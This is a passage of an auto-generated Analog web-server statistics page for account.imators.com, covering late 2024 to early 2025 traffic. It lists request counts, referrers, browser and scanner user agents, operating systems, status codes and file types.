text-decoration: none; } a:visited { color: purple; text-decoration: none; } a:link:hover { text-decoration: underline; } a:visited:hover { text-decoration: underline; } a:link:active { color: red; text-decoration: underline; } a:visited:active { color: red; text-decoration: underline; } </style> </head> <body> <div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://account.imators.com/">account.imators.com</a></h1> <p class="analysisspan">Program started on Wed, Jan 29 2025 at 1:10 PM. <br />Analyzed requests from Sun, Nov 03 2024 at 3:43 PM to Wed, Jan 29 2025 at 5:15 AM (86.56 days).</p> </div> <div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="lastseven">Figures in parentheses refer to the 7-day period ending Jan 29 2025 at 1:10 PM.</p> <p class="gensumlines"> <span class="gensumtitle">Successful requests:</span> 201 (9) <br /><span class="gensumtitle">Average successful requests per day:</span> 2 (1) <br /><span class="gensumtitle">Successful requests for pages:</span> 103 (5) <br /><span class="gensumtitle">Average successful requests for pages per day:</span> 1 (0) <br /><span class="gensumtitle">Failed requests:</span> 126 (1) <br /><span class="gensumtitle">Distinct files requested:</span> 17 (55) <br /><span class="gensumtitle">Distinct hosts served:</span> 100 (121) <br /><span class="gensumtitle">Data transferred:</span> 171.10 kilobytes (7.27 kilobytes) <br /><span class="gensumtitle">Average data transferred per day:</span> 1.98 kilobytes (1.04 kilobytes) </p> </div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 2 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Nov 2024</td><td class="R">130</td><td class="P">60</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Dec 2024</td><td class="R">16</td><td class="P">14</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> </td><td class="R"> </td><td class="P"> </td><td class="bar"> </td></tr> <tr><td class="x">Jan 2025</td><td class="R">55</td><td class="P">29</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> </tbody></table> <p class="busiesttime">Busiest month: Nov 2024 (60 requests for pages).</p> </div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Sun</td><td class="R">78</td><td class="P">33</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Mon</td><td class="R">34</td><td class="P">12</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Tue</td><td class="R">7</td><td class="P">5</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Wed</td><td class="R">11</td><td class="P">9</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Thu</td><td class="R">12</td><td class="P">12</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Fri</td><td class="R">44</td><td class="P">22</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Sat</td><td class="R">15</td><td class="P">10</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> </tbody></table> </div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">11</td><td class="P">7</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 1</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x"> 2</td><td class="R">3</td><td class="P">3</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 3</td><td class="R">9</td><td class="P">7</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 4</td><td class="R">8</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x"> 5</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x"> 6</td><td class="R">4</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x"> 7</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x"> 8</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x"> 9</td><td class="R">22</td><td class="P">6</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">10</td><td class="R">6</td><td class="P">6</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">11</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">12</td><td class="R">4</td><td class="P">3</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">13</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">14</td><td class="R">5</td><td class="P">5</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">15</td><td class="R">33</td><td class="P">12</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">16</td><td class="R">32</td><td class="P">16</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++" /></td></tr> <tr><td class="x">17</td><td class="R">39</td><td class="P">9</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">18</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">19</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">20</td><td class="R">6</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">21</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">22</td><td class="R">9</td><td class="P">9</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">23</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> </tbody></table> </div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing domains, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead> <tbody><tr><td class="R">201</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr> </tbody></table> </div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./org.png" alt="" /></p> <p class="whatinc"> Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead> <tbody><tr><td class="R">52</td><td class="b">29.78%</td><td class="xl">205.169</td></tr> <tr><td class="R">23</td><td class="b">13.41%</td><td class="xl">44</td></tr> <tr><td class="R">16</td><td class="b"> 7.87%</td><td class="xl">54</td></tr> <tr><td class="R">13</td><td class="b"> 8.10%</td><td class="xl">34</td></tr> <tr><td class="R">12</td><td class="b"> 6.09%</td><td class="xl">35</td></tr> <tr><td class="R">8</td><td class="b"> 2.81%</td><td class="xl">167.94</td></tr> <tr><td class="R">8</td><td class="b"> 5.77%</td><td class="xl">205.210</td></tr> <tr><td class="R">5</td><td class="b"> 2.50%</td><td class="xl">64.227</td></tr> <tr><td class="R">4</td><td class="b"> 0.15%</td><td class="xl">194.87</td></tr> <tr><td class="R">4</td><td class="b"> 2.89%</td><td class="xl">192.175</td></tr> <tr><td class="R">4</td><td class="b"> 2.89%</td><td class="xl">198.235</td></tr> <tr><td class="R">3</td><td class="b"> 1.05%</td><td class="xl">161.35</td></tr> <tr><td class="R">3</td><td class="b"> 1.80%</td><td class="xl">138.68</td></tr> <tr><td class="R">3</td><td class="b"> 1.05%</td><td class="xl">206.168</td></tr> <tr><td class="R">3</td><td class="b"> 1.05%</td><td class="xl">87</td></tr> <tr><td class="R">2</td><td class="b"> 0.70%</td><td class="xl">157.245</td></tr> <tr><td class="R">2</td><td class="b"> 0.70%</td><td class="xl">137.184</td></tr> <tr><td class="R">2</td><td class="b"> 0.10%</td><td class="xl">16</td></tr> <tr><td class="R">2</td><td class="b"> 0.10%</td><td class="xl">18</td></tr> <tr><td class="R">2</td><td class="b"> 0.44%</td><td class="xl">104</td></tr> <tr><td class="R">30</td><td class="b">10.74%</td><td class="xl">[not listed: 22 organizations]</td></tr> </tbody></table> </div><div class="failref"><h2><a name="failref" id="failref">Failed Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Failed Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./failref.png" alt="" /></p> <p class="whatinc"> Listing referring URLs, sorted by the number of failed requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">13</td><td class="xl"><a href="http://www.account.imators.com/">http://www.account.imators.com/</a></td></tr> <tr><td class="R">6</td><td class="xl"><a href="http://account.imators.com/">http://account.imators.com/</a></td></tr> </tbody></table> </div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./refsite.png" alt="" /></p> <p class="whatinc"> Listing referring sites, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead> <tbody><tr><td class="R">44</td><td class="xl">http://www.account.imators.com/</td></tr> <tr><td class="R">30</td><td class="xl">http://account.imators.com/</td></tr> </tbody></table> </div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browrep.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="R">15</td><td class="P">15</td><td class="xl">Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)</td></tr> <tr><td class="R">10</td><td class="P">10</td><td class="xl">Mozilla/5.0 (compatible)</td></tr> <tr><td class="R">9</td><td class="P">9</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36</td></tr> <tr><td class="R">25</td><td class="P">5</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36</td></tr> <tr><td class="R">5</td><td class="P">5</td><td class="xl">Go-http-client/1.1</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36</td></tr> <tr><td class="R">9</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36</td></tr> <tr><td class="R">11</td><td class="P">3</td><td class="xl">Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Mobile/15E148 Safari/604.1</td></tr> <tr><td class="R">15</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)</td></tr> <tr><td class="R">10</td><td class="P">2</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/92.0.4515.159 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3</td></tr> <tr><td class="R">6</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36</td></tr> <tr><td class="R">5</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36</td></tr> <tr><td class="R">5</td><td class="P">1</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Linux; Android 14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.80 Mobile Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (compatible; wpbot/1.2; +https://forms.gle/ajBaxygz9jSR8p8G9)</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Linux; Android 9; LEX829) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/10.1 Chrome/71.0.3578.99 Mobile Safari/537.36</td></tr> <tr><td class="R">24</td><td class="P">0</td><td class="xl">[not listed: 5 browsers]</td></tr> </tbody></table> </div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browsum.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">126</td><td class="P">49</td><td class="xl">Safari</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">113</td><td class="P">44</td><td class="xl"> Safari/537</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">11</td><td class="P">3</td><td class="xl"> Safari/604</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Safari/535</td></tr> <tr><td class="N">2</td><td class="R">41</td><td class="P">31</td><td class="xl">Netscape (compatible)</td></tr> <tr><td class="N">3</td><td class="R">5</td><td class="P">5</td><td class="xl">Go-http-client</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">5</td><td class="xl"> Go-http-client/1</td></tr> <tr><td class="N">4</td><td class="R">4</td><td class="P">4</td><td class="xl">Firefox</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> Firefox/65</td></tr> <tr><td class="N"> </td><td class="R">11</td><td class="P">0</td><td class="xl">[not listed: 3 browsers]</td></tr> </tbody></table> </div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./os.png" alt="" /></p> <p class="whatinc"> Listing operating systems, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">56</td><td class="P">36</td><td class="xl">OS unknown</td></tr> <tr><td class="N">2</td><td class="R">76</td><td class="P">27</td><td class="xl">Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">67</td><td class="P">24</td><td class="xl"> Windows NT</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">9</td><td class="P">3</td><td class="xl"> Unknown Windows</td></tr> <tr><td class="N">3</td><td class="R">35</td><td class="P">18</td><td class="xl">Unix</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">35</td><td class="P">18</td><td class="xl"> Linux</td></tr> <tr><td class="N">4</td><td class="R">20</td><td class="P">8</td><td class="xl">Macintosh</td></tr> </tbody></table> </div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./code.png" alt="" /></p> <p class="whatinc"> Listing status codes, sorted numerically.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead> <tbody><tr><td class="R">201</td><td class="xl">200 OK</td></tr> <tr><td class="R">32</td><td class="xl">403 Access forbidden</td></tr> <tr><td class="R">94</td><td class="xl">404 Document not found</td></tr> </tbody></table> </div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./size.png" alt="" /></p> <table> <thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 1B- 10B</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 11B- 100B</td><td class="R">14</td><td class="b"> 0.64%</td></tr> <tr><td class="x"> 101B- 1kB</td><td class="R">121</td><td class="b">36.77%</td></tr> <tr><td class="x"> 1kB- 10kB</td><td class="R">66</td><td class="b">62.59%</td></tr> </tbody></table> </div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./type.png" alt="" /></p> <p class="whatinc"> Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead> <tbody><tr><td class="R">103</td><td class="b">45.06%</td><td class="xl">[directories]</td></tr> <tr><td class="R">50</td><td class="b">37.90%</td><td class="xl">.js [JavaScript code]</td></tr> <tr><td class="R">17</td><td class="b">12.46%</td><td class="xl">.css [Cascading Style Sheets]</td></tr> <tr><td class="R">17</td><td class="b"> 3.94%</td><td class="xl">.svg</td></tr> <tr><td class="R">14</td><td class="b"> 0.64%</td><td class="xl">[no extension]</td></tr> </tbody></table> </div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a 